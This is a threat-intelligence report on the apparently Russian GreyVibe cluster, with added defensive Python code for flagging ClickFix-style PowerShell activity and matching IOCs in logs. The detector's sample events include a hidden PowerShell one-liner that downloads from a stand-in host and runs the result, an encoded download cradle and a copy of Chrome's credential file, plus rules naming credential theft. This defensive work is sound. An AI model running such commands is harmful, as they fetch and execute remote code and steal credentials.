Full Report
A likely Russian threat cluster tracked as GreyVibe has been targeting Ukrainian entities with AI-generated lures and a rich set of custom malware tools. [...]
Analysis Summary
# Threat Actor: GreyVibe
## Attribution & Identity
* **Identification:** Likely Russian-speaking threat cluster exhibiting characteristics of both nation-state operations and cybercriminal activity.
* **Aliases/Associations:** Possible links to **UAC-0098** (former TrickBot members) due to the use of a unique ISO builder.
* **Identity Indicators:** Use of Russian language in malware panels and code comments; C2 servers configured to UTC+3 (Moscow time).
* **Nature of Group:** Researchers describe it as a "hybrid" team potentially consisting of former cybercriminals absorbed into state-backed groups or operating under state-directed tasking.
## Activity Summary
GreyVibe has been active since at least **August 2025**. The group is noted for using GenAI (ChatGPT, Gemini, Ideogram) to create highly realistic lures and custom obfuscation tools. Their focus is primarily on espionage and intelligence gathering against Ukrainian targets through several distinct campaign streams.
## Tactics, Techniques & Procedures
* **AI-Enhanced Lures:** Use of LLMs to generate realistic phishing content and high-quality images for fake websites.
* **Social Engineering:**
    * **PhantomMail:** Spear-phishing with malicious archives hosted on Google Drive and 4sync.
    * **PhantomClick:** Using "ClickFix" or fake CAPTCHA pages to trick users into executing PowerShell commands (fake Cloudflare/Zoom prompts).
    * **PrincessClub:** Use of fake female Telegram personas and WebRTC-based live calls to lure targets.
* **Credential/Data Theft:** Execution of PowerShell-based RATs to exfiltrate browser credentials, Telegram/WhatsApp data, and system files.
* **Evasion:** Use of custom obfuscators (LOOKVALPS, LOOKVALJS, etc.) likely developed with AI assistance.
* **Anomalous Behavior:** Deployment of cryptocurrency miners on some targets and uploading test samples to public scanning platforms (indicating a lower level of operational security/discipline than traditional APTs).
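As an added illustration (not code from the WithSecure report or from GreyVibe's tooling), the following Python triage routine applies the kind of checks a defender would run over PowerShell process-creation and script-block telemetry to surface the PhantomClick pattern described above (a user-launched PowerShell one-liner that fetches and runs remote code) and the browser credential-store access the PowerShell RATs perform. The event records, field names and command lines are constructed for the example; real telemetry (Windows Event ID 4104/4688 or an EDR feed) would need a small adapter to these fields.

```python
import base64
import binascii
import re

# Detection heuristics (applied case-insensitively) against the effective command text.
RULES = {
    "encoded_command":  r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s",
    "hidden_window":    r"-w(?:indowstyle)?\s+hidden\b",
    "policy_bypass":    r"-e(?:p|xecutionpolicy)\s+bypass\b",
    "download_cradle":  r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod",
    "inmemory_exec":    r"\biex\b|Invoke-Expression",
    # Chromium credential files and messenger data directories the RATs reportedly collect.
    "credential_store": r"Login Data|Local State|Web Data|\\Cookies\b|\\tdata\b|WhatsApp",
    "clipboard_read":   r"Get-Clipboard",
}
# A single hit on these rules is enough to flag the event.
HIGH = {"credential_store"}

# -EncodedCommand (and its short forms) carries a base64-encoded UTF-16LE script.
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

# Constructed sample records (not real logs). Event 4's payload is built here so the
# base64 is correct by construction.
_ENCODED = base64.b64encode("IEX (New-Object Net.WebClient)".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"id": 1, "parent": "explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Reports"},
    {"id": 2, "parent": "explorer.exe",   # pasted into the Run dialog: parent is explorer.exe
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"iex (New-Object Net.WebClient)"
                ".DownloadString('http://lure.example.invalid/a')\""},
    {"id": 3, "parent": "powershell.exe",
     "cmdline": "powershell.exe -Command Copy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\"
                "User Data\\Default\\Login Data\" C:\\Users\\Public\\ld.db"},
    {"id": 4, "parent": "powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand " + _ENCODED},
    {"id": 5, "parent": "svchost.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
]


def effective_command(cmdline):
    """Return the command line with any encoded payload decoded and appended."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return cmdline  # not valid base64/UTF-16LE; inspect the raw line instead
    return cmdline + " " + decoded


def classify(event):
    """Return the list of rule names that fire for one event (in RULES order)."""
    text = effective_command(event["cmdline"])
    hits = [name for name, pat in RULES.items() if re.search(pat, text, re.I)]
    # ClickFix-style chain: the user launched PowerShell directly (explorer.exe parent)
    # and the command fetches remote content or hides its script behind encoding.
    if event["parent"].lower() == "explorer.exe" and (
            "download_cradle" in hits or "encoded_command" in hits):
        hits.append("user_launched_fetch")
    return hits


def triage(events):
    """Map event id -> rule hits for every event worth an analyst's attention."""
    flagged = {}
    for ev in events:
        hits = classify(ev)
        if len(hits) >= 2 or HIGH.intersection(hits):
            flagged[ev["id"]] = hits
    return flagged


if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS).items():
        print(event_id, ", ".join(hits))
```

The decode step matters: an encoded command hides the download cradle from naive string matching, so the rules are run over the decoded script as well as the raw command line. The explorer.exe parent check is a heuristic, not proof; it will also fire for an administrator who legitimately pastes a download one-liner into the Run dialog, so it is used to raise priority rather than as a sole verdict.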
## Targeting
* **Sectors:** Military, government, civilian, energy, telecommunications, and business sectors.
* **Geography:** Primarily Ukraine or Ukraine-related organizations.
* **Victims:** Military personnel (via fake communication portals and drone charity sites) and individuals interested in dating/adult sites.
## Tools & Infrastructure
* **Custom Malware Families:**
    * **LegionRelay:** PowerShell-based RAT for file theft, screenshots, and RDP setup.
    * **PhantomRelay:** PowerShell RAT used for system fingerprinting and dynamic script loading.
    * **FallSpy:** Android spyware for collecting contacts, call logs, location, and media.
* **Obfuscators:** LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP.
* **Infrastructure:**
    * **Lure Domains:** `zoom`, `LAPAS`, `СПО НЕБО` (fake Russian military login), and fake drone charity platforms.
    * **C2/Hosting:** Google Drive, 4sync, and WebRTC for live captures.
## Implications
GreyVibe represents a shift toward "AI-powered" threat actors where the barrier to entry for high-quality social engineering and custom code obfuscation is lowered by LLMs. Their hybrid nature (criminal/state-aligned) suggests that Russia may be increasingly leveraging or absorbing privateers to conduct espionage against Ukraine, leading to a blend of high-end lures and sometimes sloppy operational security.
## Mitigations
* **Endpoint Security:** Monitor for unauthorized PowerShell execution, especially executions that open network connections or access credential stores.
* **Identity Protection:** Implement MFA and educate users on "ClickFix"/Fake CAPTCHA tactics where they are prompted to paste commands into a terminal.
* **Mobile Defense:** Vet mobile applications and educate high-risk personnel (military/gov) on the dangers of side-loading apps from dating or charity websites.
* **IOC Blocking:** Implement blocking for indicators provided by WithSecure (e.g., at `github[.]com/WithSecureLabs/iocs/blob/master/GREYVIBE/greyvibe_iocs.csv`).
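To show how the published indicator list can be put to use beyond a block list, here is an added Python example (not WithSecure's code, and not derived from their CSV) that loads a defanged IOC file and matches it against DNS, proxy and EDR log lines. The `type,value` CSV layout, the indicator values, the log format and the placeholder hash are all constructed for the example; the actual WithSecure file may use different columns and would need the loader adjusted.

```python
import csv
import io
import ipaddress

# Placeholder hash (all zeros) standing in for a real file indicator.
PLACEHOLDER_SHA256 = "0" * 64

# Constructed, defanged IOC list in an assumed type,value layout.
IOC_CSV = (
    "type,value\n"
    "domain,lure-portal[.]example\n"
    "ipv4,203[.]0[.]113[.]25\n"
    "sha256," + PLACEHOLDER_SHA256 + "\n"
)

# Constructed log lines in a key=value style (DNS resolver, proxy, EDR).
LOG_LINES = [
    "2025-09-01T08:00:01Z dns client=10.0.0.5 query=login.lure-portal.example",
    "2025-09-01T08:00:02Z proxy client=10.0.0.5 dst=203.0.113.25:443",
    "2025-09-01T08:00:03Z dns client=10.0.0.7 query=notlure-portal.example",
    "2025-09-01T08:00:04Z edr host=WS01 sha256=" + PLACEHOLDER_SHA256 + " file=update.exe",
    "2025-09-01T08:00:05Z dns client=10.0.0.9 query=example.com",
]


def refang(value):
    """Undo the common defanging conventions used in published indicator lists."""
    return value.replace("[.]", ".").replace("hxxp", "http")


def load_iocs(csv_text):
    """Parse the CSV into normalised sets keyed by indicator type."""
    iocs = {"domain": set(), "ipv4": set(), "sha256": set()}
    for row in csv.DictReader(io.StringIO(csv_text)):
        ioc_type = row["type"].strip().lower()
        value = refang(row["value"].strip().lower())
        if ioc_type == "ipv4":
            value = str(ipaddress.ip_address(value))  # validates and normalises
        iocs.setdefault(ioc_type, set()).add(value)
    return iocs


def domain_matches(query, domains):
    """True if the queried name is an IOC domain or a subdomain of one.

    Suffix matching is done on label boundaries so that
    'notlure-portal.example' does not match 'lure-portal.example'.
    """
    q = query.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in domains)


def scan(lines, iocs):
    """Return (line_number, ioc_type, matched_value) for every indicator hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        fields = dict(tok.split("=", 1) for tok in line.split() if "=" in tok)
        if "query" in fields and domain_matches(fields["query"], iocs["domain"]):
            hits.append((n, "domain", fields["query"].lower()))
        if "dst" in fields:
            ip = fields["dst"].rsplit(":", 1)[0]  # strip the port
            if ip in iocs["ipv4"]:
                hits.append((n, "ipv4", ip))
        if "sha256" in fields and fields["sha256"].lower() in iocs["sha256"]:
            hits.append((n, "sha256", fields["sha256"].lower()))
    return hits


if __name__ == "__main__":
    for hit in scan(LOG_LINES, load_iocs(IOC_CSV)):
        print(hit)
```

Matching on label boundaries rather than plain substrings is the detail most often got wrong when an IOC list is dropped straight into a grep: it keeps subdomain hits (`login.lure-portal.example`) while avoiding false positives on unrelated names that merely end with the same characters.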